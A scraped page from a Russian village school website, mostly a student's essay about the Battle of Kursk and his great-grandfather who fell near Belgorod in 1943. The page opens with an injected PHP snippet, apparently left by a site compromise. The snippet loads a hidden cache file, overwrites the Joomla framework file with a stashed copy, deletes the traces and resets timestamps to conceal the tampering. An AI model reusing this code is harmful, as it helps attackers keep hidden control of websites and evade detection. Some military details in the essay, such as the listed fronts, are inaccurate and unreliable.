$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Мы помним и гордимся

Сайт Сагарчинской средней школы

Будущее начинается здесь и сейчас!

ВХОД



Календарь



Опрос

Интересно ли Вам на этом сайте?
 

Статистика

Пользователи : 6
Статьи : 295
Просмотры материалов : 211019

На сайте

Сейчас 66 гостей онлайн

Вход в электронный дневник

Баннер

Вход в систему "Госуслуги"

Баннер

Персональные данные Дети

Баннер

Мы помним и гордимся

Выполнил: Грак Дмитрий

Руководитель: Пестова Н.И.

Мы помним и гордимся.

    Есть исторические события, над которыми время не властно. Великая Отечественная война  в истории человечества занимает особое место. Проходят десятилетия, и каждое новое поколение, вступающее в жизнь, заново осмысляет героические и трагические страницы минувшего, воздает должное великому подвигу народа. Великая Отечественная война 1941-1945 годов была самой жестокой, самой кровопролитной войной, какие только знала Россия. И одним из крупнейших сражений Великой  Отечественной  войны  была Курская битва

         Именно здесь в июле – августе 1943 года разыгралось одно из крупнейших сражений второй мировой войны – Курская битва.

  Она началась  5 июля 1943 года, и продолжалась 50 дней и ночей. Вот что я узнал об этой битве…

Чтобы предотвратить дальнейший распад фашистского блока и повернуть ход войны, гитлеровцы решили предпринять наступление под Белгородом. Операция предусматривала неожиданное окружение и уничтожение советских войск в течение четырех дней и получила условное название - «Цитадель».  «Цитадель» получила 900 тысяч солдат, 10 тысяч орудий и миномётов, 2700 танков и штурмовых орудий, 2050 самолётов. В целом, эти силы составили 50 дивизий, в том числе 16 танковых. Из них были созданы две ударные обстановки: одна в районе Орла, другая в районе Белгорода.

«Цитадели» противостояли шесть фронтов советских войск: Центральный, Воронежский, Степной, Брянский, Западный и Юго – Восточный. Предчувствуя соблазн фашистов – использовать для первого удара Курский выступ, советское командование сосредоточило главные силы на Юго - Западном направлении в районах Орла и Белгорода.

         Почему вдруг я и  моя семья вспомнила об этой битве, о белгородской земле?....

            Меня зовут Дмитрий Грак, а мою маму  Грак (Ловецкая)  Татьяна Александровна. Мама мне рассказала, что именно мой прадед принял участие в битве под Белгородом.

           Моего прадеда звали Ловецкий Моисей Яковлевич. Рождён он в 1898 году. Так уж получилось, что на долю моего прадеда пришлись две войны: Гражданская и Великая Отечественная война.  Знаем мы о нашем родственнике не много… Родился и вырос Моисей Яковлевич в бедной крестьянской семье. Когда началась Гражданская война, Моисей был совсем молодым. Он только женился на молоденькой красавице Елене. Жили дружно в любви и согласии. Но Моисей, как и многие сагарчинцы вынужден был защищать своё село от белоказаков, поэтому вместе со своими односельчанами вступил в красный кавалерийский отряд, который в то время стоял в селе Корниловка, что неподалёку от Сагарчина.  Во время Гражданской войны ему повезло, он остался жить.

       После окончания Гражданской войны  Моисей вернулся в свой родной дом, к любимой жене. Продолжал работать в Сагарчине.  У них родились три сына и дочь…Время шло и мирный труд сагарчинцев, как и миллионов наших сограждан был прерван ещё одной  войной – Великой Отечественной. В первые дни войны многие сагарчинцы ушли на фронт. Почти каждый дом в селе проводил на фронт своего мужчину. Ушёл и Моисей. Служил он старшиной 280 гв. СП., 92 гв. СД. Очень редко приходили от него письма, но в каждом письме он писал, как он скучает по семье, как любит всех, как хотел бы вернуться в свой родной дом. Но встретиться им больше не пришлось. Мой прадед Моисей Яковлевич погиб в 1943 году под городом Белгородом, как и сотни наших советских солдат. А в октябре 43-го года в семью пришло письмо, в котором говорилось, что Моисея Яковлевича больше нет. Погиб… Я  теперь знаю, что это была одна из самых кровавых битв во времена Великой Отечественной войны. Много людей погибло в той битве, но русские войска отстояли свою Родину.

       Мама моя вспоминает, что когда она училась в Сагарчинской школе, то с гордостью проходила мимо стенда, который посвящён солдатам, погибшим в той великой войне. А теперь и я буду гордиться, что и моя семья внесла частичку победы в той очень кровавой войне.  Разве можно такое забыть? Сколько бед потерпел наш народ, сколько погибло людей, сколько было пролито слёз.  Мы должны быть благодарны тем людям, которые свою жизнь отдали за победу. Ведь если бы наш народ не сражался тогда, до последней капли крови, то не было бы нашего сегодняшнего мира.

           Великая Отечественная Война - это огромная душевная рана в человеческих сердцах. Началась эта страшная трагедия двадцать второго июня тысяча девятьсот сорок первого года, а закончилась только через четыре года, через четыре тяжелых года - девятого мая тысяча девятьсот сорок пятого года. Вместе с весной пришла на многострадальную землю долгожданная Победа. Слезами радости встретили ее бойцы Великой Отечественной войны, также встречаем этот день и мы, их потомки. Страшно представить, сколько пришлось пережить каждому воевавшему… И сейчас, в мае 2015 года, мы, дети 21-го века,  со слезами радости на глазах будем отмечать 70-летие Великой Победы в этой войне.